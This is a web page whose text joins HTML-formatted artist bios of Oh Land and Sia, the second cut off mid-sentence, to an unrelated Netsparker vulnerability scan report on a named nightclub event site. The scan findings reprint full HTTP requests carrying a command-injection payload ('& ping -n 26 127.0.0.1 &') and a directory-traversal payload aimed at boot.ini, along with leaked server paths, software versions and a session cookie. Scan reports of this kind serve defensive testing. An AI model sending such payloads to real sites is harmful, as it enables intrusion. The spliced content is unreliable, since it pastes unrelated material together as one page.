<div id="artist-info">[&nbsp;<a href="http://www.myspace.com/ohlandmusic">MYSPACE</a>]<br />
<span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<meta charset="utf-8">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Oh Land is a peculiar new cinematic electropop Dane who recently sailed across the sea to the artistic haven of Brooklyn, NY. With an opera singer for a mother, a theater organist for a father and Bj&ouml;rk's Homogenic on constant rotation, Oh Land was enraptured by the combination of experimental and classical arts. &quot;My goal is to sound like I'm from 2050, but still feel really classic, like the music is an old friend,&quot; said Oh Land. She spent her days pirouetting as a ballet dancer at the Danish Royal Ballet Academy when an injury forced her to reinvent herself and discover her true talent and passion as a musician. Oh Land soon released her first album, Fauna, which garnered critical acclaim in her homeland of Denmark. Her soundscapes are lavish, crunchy, symphonic, brute and captivated with rhythms that fly apart. She translates the sounds live via her &quot;contraption&quot; - a homemade one-woman-band music box topped with balloon video projections (seeing is believing). Her music is for movement and new songs such as the thumping &quot;Sun of a Gun&quot; and euphoric &quot;White Nights&quot; have proven to make even the most portentous get up and dance. Having been discovered by Epic Records at 2009's SXSW, she released her US debut EP on October 19, 2010.</span><br />
<br />
</span> <br />
<div id="artist-info"><span style="color: rgb(255, 0, 0); ">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-size: 13px; text-transform: uppercase; ">Sia<br />
</span>&nbsp;[ </meta>
</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Arial, Verdana, sans-serif; line-height: normal; font-size: small; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; ">
<div id="artist-info" style="display: inline !important; "><dl style="display: inline !important; "><dt style="display: inline !important; "><span style="color: rgb(255, 0, 0); ">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><a target="_blank" href="http://siamusic.net/">OFFICIAL WEBSITE</a> :&nbsp;</div>
</div>
</span><font class="Apple-style-span" color="#FF0000">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 0, 0); "><a target="_blank" href="http://www.myspace.com/siamusic">MYSPACE</a>]</span><br />
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); ">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Sia Furler, a native Australian, was born on December 18th, 1975 and was destined to be an entertainer. At a young age she would perform for her family and friends with her interpretations of Madonna, Cyndi Lauper and Men at Work. If one should be so lucky to peruse her family albums, they would certainly find photos of Sia as a child adorning pink tutus and roller skates in poses fit for Cirque du Soleil. When Sia was 9 she performed with her father's band The Soda Jerx covering the song &quot;Shimmy Shimmy Coco Bop&quot;. Be..
Database Error Message

Database Error Message
1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&size=dc..

Parameters

Parameter Type Value
id GET "& ping -n 26 127.0.0.1 &
size GET dcaf1\

Request

GET /show_event_sub.php?id=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Cookie: PHPSESSID=4cecbb5cd55b098f64f076f0344baa06
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html


<p class="warning">No Event Selected</p><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - Event</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>Event</h1></div--><div class="content"><br /><b>Warning</b>: mysql_result(): supplied argument is not a valid MySQL result resource in <b>/home/eventweb/public_html/show_event_sub.php</b> on line <b>48</b><br /></td><tr><tr><td height="20"></td></tr></table></body>
Programming Error Message

Programming Error Message
1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&size=dc..

Parameters

Parameter Type Value
id GET "& ping -n 26 127.0.0.1 &
size GET dcaf1\

Identified Error Message

<b>Warning</b>: mysql_result(): supplied argument is not a valid MySQL result resource in <b>/home/eventweb/public_html/show_event_sub.php</b> on line <b>48</b>

Request

GET /show_event_sub.php?id=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Cookie: PHPSESSID=4cecbb5cd55b098f64f076f0344baa06
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html


<p class="warning">No Event Selected</p><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - Event</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>Event</h1></div--><div class="content"><br /><b>Warning</b>: mysql_result(): supplied argument is not a valid MySQL result resource in <b>/home/eventweb/public_html/show_event_sub.php</b> on line <b>48</b><br /></td><tr><tr><td height="20"></td></tr></table></body>
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=../../../../../../../../../../boot.ini&size=dcaf1%5C

Parameters

Parameter Type Value
id GET ../../../../../../../../../../boot.ini
size GET dcaf1\

Found E-mails

webmaster@event.websterhall.com

Request

GET /show_event_sub.php?id=../../../../../../../../../../boot.ini&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Cookie: PHPSESSID=4cecbb5cd55b098f64f076f0344baa06
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 25 Jul 2011 04:36:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 860
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, webmaster@event.websterhall.com and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at event.websterhall.com Port 80</address></body></html>
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)
1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&size=dc..

Identified Internal Path(s)

/home/eventweb/public_html/show_event_sub.php

Request

GET /show_event_sub.php?id=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Cookie: PHPSESSID=4cecbb5cd55b098f64f076f0344baa06
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html


<p class="warning">No Event Selected</p><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - Event</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>Event</h1></div--><div class="content"><br /><b>Warning</b>: mysql_result(): supplied argument is not a valid MySQL result resource in <b>/home/eventweb/public_html/show_event_sub.php</b> on line <b>48</b><br /></td><tr><tr><td height="20"></td></tr></table></body>